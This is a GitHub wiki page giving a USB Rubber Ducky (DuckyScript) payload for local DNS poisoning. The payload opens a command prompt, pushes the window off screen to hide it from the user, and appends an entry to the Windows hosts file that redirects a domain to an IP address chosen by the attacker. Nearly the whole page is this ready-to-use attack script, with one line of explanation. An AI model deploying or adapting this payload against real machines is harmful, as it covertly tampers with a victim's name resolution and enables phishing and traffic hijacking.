Payload local dns poisoning - a3rd/USB-Rubber-Ducky GitHub Wiki

The following is a local DNS poisoning attack that changes a hosts 'host' file. The host will then be redirected to the website of your choice (IP Address), every time the user types in the given domain name in their browser.

REM Author:ashbreeze96 and overwraith
GUI r
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
DELAY 50
STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
DELAY 50
ENTER
DELAY 50
STRING ECHO 10.0.0.1 ADMIN.COM >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
DELAY 50
ENTER
STRING exit
ENTER
⚠️ **GitHub.com Fallback** ⚠️